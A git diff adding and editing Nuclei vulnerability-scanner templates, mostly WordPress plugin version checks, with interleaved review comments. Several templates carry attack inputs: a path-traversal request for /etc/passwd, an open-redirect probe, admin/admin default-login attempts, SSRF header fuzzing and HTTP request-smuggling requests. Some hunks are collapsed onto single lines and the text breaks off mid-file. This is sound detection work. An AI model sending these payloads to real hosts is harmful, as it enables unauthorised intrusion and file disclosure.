new file mode 100644
index 0000000000..96d346ddf1
--- /dev/null
+++ b/poc/cve/CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7435-56bbd99bfe68d581fd709483401a1c1a
+
+info:
+ name: >
+ Attire <= 2.0.6 - Authenticated (Contributor+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+ The Attire theme for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.0.6 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f21cbe18-77e1-4a9a-96a0-74edaef0db3e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7435
+ metadata:
+ fofa-query: "wp-content/themes/attire/"
+ google-query: inurl:"/wp-content/themes/attire/"
+ shodan-query: 'vuln:CVE-2024-7435'
+ tags: cve,wordpress,wp-theme,attire,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/attire/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "attire"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml b/poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml
new file mode 100644
index 0000000000..80da29bf49
--- /dev/null
+++ b/poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e
+
+info:
+ name: >
+ WP Events Manager <= 2.1.11 - Authenticated (Subscriber+) Time-Based SQL Injection
+ author: topscoder
+ severity: low
+ description: >
+ The WP Events Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘order’ parameter in all versions up to, and including, 2.1.11 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/88dc08ff-3966-4606-855c-57c25552599e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7717
+ metadata:
+ fofa-query: "wp-content/plugins/wp-events-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-events-manager/"
+ shodan-query: 'vuln:CVE-2024-7717'
+ tags: cve,wordpress,wp-plugin,wp-events-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-events-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-events-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7858.yaml b/poc/cve/CVE-2024-7858.yaml
new file mode 100644
index 0000000000..3ccd201acc
--- /dev/null
+++ b/poc/cve/CVE-2024-7858.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7858
+
+info:
+ name: >
+ Media Library Folders <= 8.2.3 - Missing Authorization on Various Functions
+ author: topscoder
+ severity: low
+ description: >
+ The Media Library Folders plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several AJAX functions in the media-library-plus.php file in all versions up to, and including, 8.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions related to managing media files and folder along with controlling settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fcc0fc00-b7d6-429c-9ab3-f08971c48777?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-7858
+ metadata:
+ fofa-query: "wp-content/plugins/media-library-plus/"
+ google-query: inurl:"/wp-content/plugins/media-library-plus/"
+ shodan-query: 'vuln:CVE-2024-7858'
+ tags: cve,wordpress,wp-plugin,media-library-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/media-library-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "media-library-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8016.yaml b/poc/cve/CVE-2024-8016.yaml
new file mode 100644
index 0000000000..68cc74ccf9
--- /dev/null
+++ b/poc/cve/CVE-2024-8016.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8016
+
+info:
+ name: >
+ The Events Calendar Pro <= 7.0.2 - Authenticated (Administrator+) PHP Object Injection to Remote Code Execution
+ author: topscoder
+ severity: low
+ description: >
+ The Events Calendar Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 7.0.2 via deserialization of untrusted input from the 'filters' parameter in widgets. This makes it possible for authenticated attackers, with administrator-level access and above, to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely. In certain configurations, this can be exploitable by lower level users. We confirmed that this plugin installed with Elementor makes it possible for users with contributor-level access and above to exploit this issue.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/34f0e5a6-0bd3-4734-b7e0-27dc825d193f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.1
+ cve-id: CVE-2024-8016
+ metadata:
+ fofa-query: "wp-content/plugins/events-calendar-pro/"
+ google-query: inurl:"/wp-content/plugins/events-calendar-pro/"
+ shodan-query: 'vuln:CVE-2024-8016'
+ tags: cve,wordpress,wp-plugin,events-calendar-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/events-calendar-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "events-calendar-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 7.0.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml b/poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml
new file mode 100644
index 0000000000..8c82cbaebd
--- /dev/null
+++ b/poc/cve/CVE-2024-8108-388981d89511f13ba76287252ce2c890.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8108-388981d89511f13ba76287252ce2c890
+
+info:
+ name: >
+ Share This Image <= 2.01 - Authenticated (Contributor+) Stored Cross-Site Scripting via alignment Parameter
+ author: topscoder
+ severity: low
+ description: >
+ The Share This Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alignment' parameter in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cb5368f-99b1-43e3-a2e4-67e90c8edfcf?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-8108
+ metadata:
+ fofa-query: "wp-content/plugins/share-this-image/"
+ google-query: inurl:"/wp-content/plugins/share-this-image/"
+ shodan-query: 'vuln:CVE-2024-8108'
+ tags: cve,wordpress,wp-plugin,share-this-image,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/share-this-image/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "share-this-image"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.01')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8252.yaml b/poc/cve/CVE-2024-8252.yaml
new file mode 100644
index 0000000000..91b82e7edd
--- /dev/null
+++ b/poc/cve/CVE-2024-8252.yaml
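Review bot: `compare_versions(version, '<= 2.01')` in the `dsl` matcher depends on how the DSL treats a segment with a leading zero; if `01` is normalised to the integer 1, then `2.01` and `2.1` compare as the same version, so an installed `2.1` (should such a release exist) would be reported vulnerable while `2.02` would sort above it. Whether that produces a wrong verdict depends on the plugin's actual release series, which I cannot confirm from here, so it is worth checking before relying on this constraint. A comment next to the constraint such as `# vendor uses two-digit minor segments (2.01, ...): confirm compare_versions orders them as intended` would at least record the assumption.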
@@ -0,0 +1,59 @@
+id: CVE-2024-8252
+
+info:
+ name: >
+ Clean Login <= 1.14.5 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Clean Login plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.14.5 via the 'template' attribute of the clean-login-register shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b9f99b51-e1b1-4cd3-a9f7-24e4b59811a7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-8252
+ metadata:
+ fofa-query: "wp-content/plugins/clean-login/"
+ google-query: inurl:"/wp-content/plugins/clean-login/"
+ shodan-query: 'vuln:CVE-2024-8252'
+ tags: cve,wordpress,wp-plugin,clean-login,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clean-login/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clean-login"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.14.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8274.yaml b/poc/cve/CVE-2024-8274.yaml
new file mode 100644
index 0000000000..e9b25614eb
--- /dev/null
+++ b/poc/cve/CVE-2024-8274.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-8274
+
+info:
+ name: >
+ WP Booking Calendar <= 10.5 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The WP Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via several parameters from 'timeline_obj' in all versions up to, and including, 10.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/83804c2a-2c4a-4f69-b833-dcd53ddab94d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-8274
+ metadata:
+ fofa-query: "wp-content/plugins/booking/"
+ google-query: inurl:"/wp-content/plugins/booking/"
+ shodan-query: 'vuln:CVE-2024-8274'
+ tags: cve,wordpress,wp-plugin,booking,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/booking/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "booking"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 10.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml b/poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
new file mode 100644
index 0000000000..25665a01fa
--- /dev/null
+++ b/poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc + +info: + name: > + WPZOOM Portfolio Lite – Filterable Portfolio Plugin <= 1.4.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + The WPZOOM Portfolio Lite – Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘align’ attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-8276 + metadata: + fofa-query: "wp-content/plugins/wpzoom-portfolio/" + google-query: inurl:"/wp-content/plugins/wpzoom-portfolio/" + shodan-query: 'vuln:CVE-2024-8276' + tags: cve,wordpress,wp-plugin,wpzoom-portfolio,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wpzoom-portfolio/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpzoom-portfolio" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file 
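Review bot: `severity: low` and the `low` tag disagree with the template's own `cvss-score: 6.4` (`AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N`), which is Medium; stored XSS that executes for every visitor of the injected page should carry `severity: medium` with the tag list ending in `medium`. The `id` also embeds a hash suffix (`CVE-2024-8276-abcb…`) while the sibling templates in this commit use the bare CVE id; if the suffix is there to avoid a clash with another copy, the clash itself is the thing to fix rather than the id.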
diff --git a/poc/cve/CVE-2024-8319.yaml b/poc/cve/CVE-2024-8319.yaml new file mode 100644 index 0000000000..1928034959 --- /dev/null +++ b/poc/cve/CVE-2024-8319.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-8319 + +info: + name: > + Tourfic <= 2.11.20 - Cross-Site Request Forgery in Multiple Functions + author: topscoder + severity: medium + description: > + The Tourfic plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.11.20. This is due to missing or incorrect nonce validation on the tf_order_status_email_resend_function, tf_visitor_details_edit_function, tf_checkinout_details_edit_function, tf_order_status_edit_function, tf_order_bulk_action_edit_function, tf_remove_room_order_ids, and tf_delete_old_review_fields functions. This makes it possible for unauthenticated attackers to resend order status emails, update visitor/order details, edit check-in/out details, edit order status, perform bulk order status updates, remove room order IDs, and delete old review fields, respectively, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/07fa7b1a-9137-4049-a20a-8eb6df7ca578?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-8319 + metadata: + fofa-query: "wp-content/plugins/tourfic/" + google-query: inurl:"/wp-content/plugins/tourfic/" + shodan-query: 'vuln:CVE-2024-8319' + tags: cve,wordpress,wp-plugin,tourfic,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tourfic/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tourfic" + part: body + + - type: dsl + dsl: 
+ - compare_versions(version, '<= 2.11.20') \ No newline at end of file diff --git a/poc/cve/cve-2001-1473.yaml b/poc/cve/cve-2001-1473.yaml index d7ad14a2d1..80480efb7b 100644 --- a/poc/cve/cve-2001-1473.yaml +++ b/poc/cve/cve-2001-1473.yaml @@ -1,11 +1,11 @@ id: CVE-2001-1473 + info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy severity: high - tags: cve,cve2001,network,ssh,openssh + description: SSHv1 is deprecated and has known cryptographic issues. - remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 @@ -14,13 +14,13 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: word words: - "SSH-1" - -# Updated by Chris on 2022/01/21 diff --git a/poc/cve/cve-2008-5587.yaml b/poc/cve/cve-2008-5587.yaml index e714f96cca..fda684a006 100644 --- a/poc/cve/cve-2008-5587.yaml +++ b/poc/cve/cve-2008-5587.yaml 
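Review bot: The first hunk of cve-2001-1473.yaml deletes `tags: cve,cve2001,network,ssh,openssh` and `remediation: Upgrade to SSH 2.4 or later.` and adds only a `description`, so the template ends up with no tags at all and can no longer be selected or excluded by `-tags`/`-etags`. Keep the tags line alongside the new description, e.g. `tags: cve,cve2001,network,ssh,openssh`, and keep a remediation line (the wording could be corrected to recommend SSH protocol 2 rather than the odd "SSH 2.4"). Separately, the `SSH-1` word matcher also fires on `SSH-1.99-` banners, which advertise both protocol versions — that is still an SSHv1-enabled server, so the match is valid, but the description should say the host may be dual-protocol rather than v1-only.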
@@ -1,27 +1,28 @@ id: CVE-2008-5587 - info: name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion author: dhiyaneshDK severity: medium - reference: https://www.exploit-db.com/exploits/7363 - + description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/7363 + - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ + - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 + - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 + classification: + cve-id: CVE-2008-5587 metadata: - shodan-query: 'http.title:"phpPgAdmin"' - description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php." - + shodan-query: http.title:"phpPgAdmin" + tags: cve,cve2008,lfi,phppgadmin requests: - method: GET path: - '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00' - matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 diff --git a/poc/cve/cve-2016-6210.yaml b/poc/cve/cve-2016-6210.yaml index 0cf11fcf80..668fd715ec 100644 --- a/poc/cve/cve-2016-6210.yaml +++ b/poc/cve/cve-2016-6210.yaml @@ -1,9 +1,10 @@ id: CVE-2016-6210 + info: name: OpenSSH username enumeration < v7.3 author: iamthefrogy,forgedhallpass severity: medium - tags: cve,cve2016,network,openssh + description: OpenSSH before 7.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 
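Review bot: The payload `_language=../../../../../../../../etc/passwd%00` depends on null-byte truncation of the include path, which PHP stopped honouring in 5.3.4, so on any phpPgAdmin 4.2.1 install running a later PHP the request returns nothing and the template reports clean even though the traversal is still present; the description should state this limitation (e.g. `Detection relies on %00 truncation and will miss hosts on PHP >= 5.3.4.`) or a second path without `%00` should be tried. The template also keeps the legacy `requests:` key while this same commit migrates header-injection.yaml and cl-te-http-smuggling.yaml to `http:`; it should be `http:` here too for consistency. The `tags:` line is inserted inside `metadata:` in the new text rather than at `info:` level, which the loader is unlikely to recognise as tags — it belongs one indentation level up, after `classification:`.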
@@ -15,15 +16,18 @@ info: cvss-score: 5.9 cve-id: CVE-2016-6210 cwe-id: CWE-200 + network: - host: - "{{Hostname}}" - "{{Host}}:22" + matchers: - type: regex regex: - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][\n^\r]+)' + extractors: - type: regex regex: - - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' + - '(?i)SSH-2.0-OpenSSH_[^\r\n]+' \ No newline at end of file diff --git a/poc/cve/cve-2017-14524.yaml b/poc/cve/cve-2017-14524.yaml index 20a95213bc..e87149510b 100644 --- a/poc/cve/cve-2017-14524.yaml +++ b/poc/cve/cve-2017-14524.yaml 
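Review bot: The second alternative of the matcher regex, `7\.[0-2][^\d][\n^\r]+`, can only match a 7.0–7.2 banner that ends immediately after the version: `[\n^\r]` is a character class of newline, caret and carriage return, not a negated class, so a real banner such as `SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8` fails at the `2` after `p` and the vulnerable host is never reported. Change it to `'(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r\n]+|7\.[0-2][^\d][^\r\n]*)'`, which accepts any non-digit after the minor version and still rejects `7.20`-style versions. As with any banner check, distribution builds that backport the fix without bumping the version string will still match; a hedge to that effect in `description` would help triage.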
@@ -1,43 +1,25 @@ id: CVE-2017-14524 - info: - name: OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect + name: OpenText Documentum Administrator 7.2.0180.0055 - Open redirect author: 0x_Akoko - severity: medium - description: | - OpenText Documentum Administrator 7.2.0180.0055 is susceptible to multiple open redirect vulnerabilities. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. - remediation: | - Apply the latest security patches or upgrade to a patched version of OpenText Documentum Administrator. + severity: low + description: Multiple open redirect vulnerabilities in OpenText Documentum Administrator 7.2.0180.0055 allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. reference: - https://seclists.org/fulldisclosure/2017/Sep/57 - - https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 - - https://nvd.nist.gov/vuln/detail/CVE-2017-14524 - - http://seclists.org/fulldisclosure/2017/Sep/57 - - https://github.com/ARPSyndicate/cvemon + - https://www.cvedetails.com/cve/CVE-2017-14524 + - https://vuldb.com/?id.107201 + tags: cve,cve2017,redirect,opentext classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 cve-id: CVE-2017-14524 cwe-id: CWE-601 - epss-score: 0.00258 - epss-percentile: 0.6357 - cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: opentext - product: documentum_administrator - tags: cve2017,cve,redirect,opentext,seclists - -http: +requests: - method: GET path: - - '{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me' - + - 
'{{BaseURL}}/xda/help/en/default.htm?startat=//example.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' + part: header diff --git a/poc/cve/cve-2021-44451.yaml b/poc/cve/cve-2021-44451.yaml index 71a197e9fd..bc69c3ca6e 100644 --- a/poc/cve/cve-2021-44451.yaml +++ b/poc/cve/cve-2021-44451.yaml @@ -1,4 +1,5 @@ id: CVE-2021-44451 + info: name: Apache Superset Default Login author: dhiyaneshDK @@ -11,12 +12,14 @@ info: tags: apache, default-login classification: cve-id: CVE-2021-44451 + requests: - raw: - | GET /login/ HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} + - | POST /login/ HTTP/1.1 Host: {{Hostname}} @@ -25,12 +28,14 @@ requests: Referer: {{BaseURL}}/admin/airflow/login csrf_token={{csrf_token}}&username={{username}}&password={{password}} + attack: pitchfork payloads: username: - admin password: - admin + extractors: - type: regex name: csrf_token @@ -39,6 +44,7 @@ requests: internal: true regex: - 'value="(.*?)">' + matchers-condition: and matchers: - type: word @@ -48,10 +54,12 @@ requests: - 'Redirecting...' - '
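Review bot: The rewritten info block sets `severity: low` while keeping `cvss-score: 6.10` / `AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`, which is Medium; the old `severity: medium` was right and should be restored (and `6.10` is better written as `6.1`). The hunk also regresses `http:` back to the legacy `requests:` key and drops `metadata`/`cpe`/`epss` that other templates carry, which runs against the `requests:` → `http:` migration this same commit performs on header-injection.yaml; `http:` should be kept. Switching the redirect target from `oast.me` to `example.com` is fine for this check, since the Location header is matched directly and no OOB callback is needed.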

Redirecting...' + - type: word part: header words: - 'session' + - type: status status: - 302 diff --git a/poc/header/header-injection.yaml b/poc/header/header-injection.yaml index daf402fa73..d1774491f4 100644 --- a/poc/header/header-injection.yaml +++ b/poc/header/header-injection.yaml @@ -7,7 +7,7 @@ info: description: Fuzzing headers for OOB SSRF tags: fuzz,ssrf -requests: +http: - payloads: header: helpers/payloads/proxy-headers.txt diff --git a/poc/http/cl-te-http-smuggling.yaml b/poc/http/cl-te-http-smuggling.yaml index 278b84146d..ddb83e064d 100644 --- a/poc/http/cl-te-http-smuggling.yaml +++ b/poc/http/cl-te-http-smuggling.yaml @@ -1,35 +1,37 @@ -id: CL-TE-http-smuggling -info: - name: HTTP request smuggling, basic CL.TE vulnerability - author: pdteam, akincibor - severity: Low -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - |+ - POST / HTTP/1.1 - Host: {{Hostname}} - Connection: keep-alive - Content-Type: application/x-www-form-urlencoded - Content-Length: 6 - Transfer-Encoding: chunked - - 0 - - G - - unsafe: true - matchers: - - type: dsl - dsl: - - 'contains(body, "Unrecognized method 